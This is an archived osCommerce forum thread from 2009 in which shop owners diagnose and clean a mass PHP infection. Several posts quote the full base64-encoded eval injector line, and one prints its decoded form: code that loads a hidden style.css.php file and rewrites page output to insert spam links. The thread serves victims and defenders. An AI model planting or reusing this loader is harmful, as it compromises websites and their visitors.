FIMBLE Posted October 1, 2009 Share Posted October 1, 2009 eval(base64_decode hack going around the internet, If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack. Some of the more common signs of this are * Category images stop displaying * FCK editor refuses to display images folder * Payment modules stop working * Checkout process stops working How will you know? Open any PHP file on your server, if at the very top you see a line like <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while) Then you have been hacked. To clean your site you have two options, 1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected) And restore from a good back up. This is the best and easy route. 2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder. Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time! When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens. Now your site is free on the code, you need to prevent it from happening again. How to prevent infection. This is not guaranteed 100% proof but it is going to help stop re-infection. Change the name of your admin folder to something less obvious. Delete admin/filemanager.php and associated links. Ensure that your folder permissions are never set higher than 755 Install some security addons, Also some ideas from this post can help you, If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when. There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here. Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
pinklep Posted October 1, 2009 Share Posted October 1, 2009 eval(base64_decode hack going around the internet, If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack. Some of the more common signs of this are * Category images stop displaying * FCK editor refuses to display images folder * Payment modules stop working * Checkout process stops working How will you know? Open any PHP file on your server, if at the very top you see a line like <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while) Then you have been hacked. To clean your site you have two options, 1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected) And restore from a good back up. This is the best and easy route. 2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder. Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time! When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens. Now your site is free on the code, you need to prevent it from happening again. How to prevent infection. This is not guaranteed 100% proof but it is going to help stop re-infection. Change the name of your admin folder to something less obvious. Delete admin/filemanager.php and associated links. Ensure that your folder permissions are never set higher than 755 Install some security addons, Also some ideas from this post can help you, If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when. There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here. Thank you very much for the information. I found a file called NuSoup.php that I dont recognize. Could this be a file used for hacking? I am a Jedi, like my father before me! Link to comment Share on other sites More sharing options...
♥ecartz Posted October 1, 2009 Share Posted October 1, 2009 Ensure that your folder permissions are never set higher than 755It's worth noting that ownership is as important as permissions. If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777. If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories. A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that. Always back up before making changes. Link to comment Share on other sites More sharing options...
jonatanvalencia Posted October 2, 2009 Share Posted October 2, 2009 Damn, I am hacked, I saw that line since one month ago and I thought it was strange but no catched enough attention from me. Now I saw some product_info.php/?fxkp=0'>forex online system trading stuff above my body html code and I said it was impossible I hope to clean up my whole sites. Regards Link to comment Share on other sites More sharing options...
PapaJohnL Posted October 2, 2009 Share Posted October 2, 2009 FYI on this hack...I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to php files. So, It would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker? For what it's worth, in case any of you have a forum, he is registering under the name [email protected] Link to comment Share on other sites More sharing options...
Guest Posted October 2, 2009 Share Posted October 2, 2009 FYI on this hack...I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to php files. So, It would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker? For what it's worth, in case any of you have a forum, he is registering under the name [email protected] My list of banned IPs continues to grow. Link to comment Share on other sites More sharing options...
germ Posted October 3, 2009 Share Posted October 3, 2009 Someone else posted that their hack came from a server in a Chevy van somewhere along the arctic circle... :huh: Like vultures to a rotting carcass... :o If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Jet200 Posted October 3, 2009 Share Posted October 3, 2009 question on the database restore part... will i lose any info that i've acquired from infection (9/22) until now? Link to comment Share on other sites More sharing options...
FIMBLE Posted October 3, 2009 Author Share Posted October 3, 2009 question on the database restore part... will i lose any info that i've acquired from infection (9/22) until now? Yes you will, restoring will take your database and all information contained within back to the restore date. Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
FIMBLE Posted October 3, 2009 Author Share Posted October 3, 2009 Thank you very much for the information. I found a file called NuSoup.php that I dont recognize. Could this be a file used for hacking? There is a nusoap.php is that what you mean? Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
birdmantx Posted October 4, 2009 Share Posted October 4, 2009 I also have been hacked and found the malicious code. I banned a IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious. I used the decode hack and it didnt work for me. Can someone tell me which files were planted and need to be removed? What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked. Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body. Flying away to get back to work. Link to comment Share on other sites More sharing options...
FIMBLE Posted October 4, 2009 Author Share Posted October 4, 2009 There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery. You really need to decode the line to find the place that the files are located in. There can be a lot of files or one or two, and called different names. style.css.php is one dg.php another there are .swf files also With the decoder just add the code minus the <?php (' at the start and the ')?> at the end Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
geode vibrations Posted October 4, 2009 Share Posted October 4, 2009 <b>To clean your site you have two options,</b> 1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected) And restore from a good back up. This is the best and easy route. Hello, can you help? Followed advise and I was infected. Have been through all files and removed all php from server. I assume that restore is done from oscommerce admin. When I go to access this i have deleted shop/admin/login.php and so can't access it to reload. I know my product information is still there in files pics etc. how can I get the missing php so I can restore? Link to comment Share on other sites More sharing options...
FIMBLE Posted October 4, 2009 Author Share Posted October 4, 2009 Hi you can use one from back up, or you can download a fresh copy of your osCommerce version and upload the file from that Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
birdmantx Posted October 4, 2009 Share Posted October 4, 2009 Hello, I have tried so many ways to use the decoder you reccomend, with no luck. Here is the code: **/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> <?php /* $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); // the following cPath references come from application_top.php $category_depth = 'top'; if (isset($cPath) && tep_not_null($cPath)) { $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'"); $cateqories_products = tep_db_fetch_array($categories_products_query); if ($cateqories_products['total'] > 0) { $category_depth = 'products'; // display products } else { $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'"); $category_parent = tep_db_fetch_array($category_parent_query); if ($category_parent['total'] > 0) { $category_depth = 'nested'; // navigate through the categories } else { $category_depth = 'products'; // category has no products, but display the 'no products' message } } } // BOF edit pages $pages_name = "home"; $page_query = tep_db_query("select pd.pages_title, pd.pages_body, p.pages_id Flying away to get back to work. Link to comment Share on other sites More sharing options...
FIMBLE Posted October 4, 2009 Author Share Posted October 4, 2009 here it is '/catalog/includes/languages/english/modules/shipping/style.css.php For anyone else having problems you need to strip the tags and apostrophes so it looks like aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ== Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
birdmantx Posted October 4, 2009 Share Posted October 4, 2009 here it is '/catalog/includes/languages/english/modules/shipping/style.css.php Nic So besides cleaning or replacing each php file, is that the only file that needs to be removed? Flying away to get back to work. Link to comment Share on other sites More sharing options...
FIMBLE Posted October 4, 2009 Author Share Posted October 4, 2009 you need to compare the folder contents with either your back up or another trusted source, as ive said a few times here there can be many new files added. You will be better off deleting the folder and uploading a good one. Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
birdmantx Posted October 5, 2009 Share Posted October 5, 2009 Nic found 35 hidden files in my site that didnt belong there. One of the files was style.css, some people might have missed that one. He cleaned all the files and my site is perfect now. I have one question though. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this? Even though my team the Dallas Cowboys lost, I can sleep good knowing my site is up and running. Funny I am sleeping when most of you are awake and vise versa. Best wishes! Sam- in Texas Flying away to get back to work. Link to comment Share on other sites More sharing options...
fijiislander Posted October 5, 2009 Share Posted October 5, 2009 Joining the club - Hacked - and my team lost again today. I can confirm that any php file, even simple redirects in subdomains, will get nailed. Incidentally I had 755 as the minimum, but now I know better. Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla? Obviously the authors "like" OsCommerce. Link to comment Share on other sites More sharing options...
fijiislander Posted October 5, 2009 Share Posted October 5, 2009 Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla? After a quick check it seems that most of the open source php programs were hit, which includes WordPress and Joomla. One thing in common is the use of 'Admin' or 'Administration' in folder and file names. The WordPress discussions are advising the deletion and reloading of dbases. Link to comment Share on other sites More sharing options...
FIMBLE Posted October 5, 2009 Author Share Posted October 5, 2009 After a quick check it seems that most of the open source php programs were hit, which includes WordPress and Joomla. One thing in common is the use of 'Admin' or 'Administration' in folder and file names. The WordPress discussions are advising the deletion and reloading of dbases. permissions are not the determining factor for this attack, its the presence of the admin folder still called admin, and the filemanager.php. Once in it will spread to any PHP file platform / package independent adding its code as it goes. I can imagine in a lot of cases there will be many more php files that osC ones. Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
birdmantx Posted October 5, 2009 Share Posted October 5, 2009 Question I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this? Flying away to get back to work. Link to comment Share on other sites More sharing options...
FIMBLE Posted October 5, 2009 Author Share Posted October 5, 2009 Well its the two million dollar question! Was it or not? Nothing proven, and nothing admitted. Not sure we will ever know that Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Guest Posted October 5, 2009 Share Posted October 5, 2009 I was able to decode mine and found out that the file was added to a wordpress blog that i have on another domain that is hosted within my oscommerce store account I decided to delete the whole blog from the server. I still have a question about the code, which I have pasted below already decoded...As you see, there is still a lot of it not decoded follow by a "gzdecode" How can I decode that? if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/content/y/o/g/yogicchai/html/pilotbaba/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php')){include_once('/home/content/y/o/g/yogicchai/html/pilotbaba/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}} Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.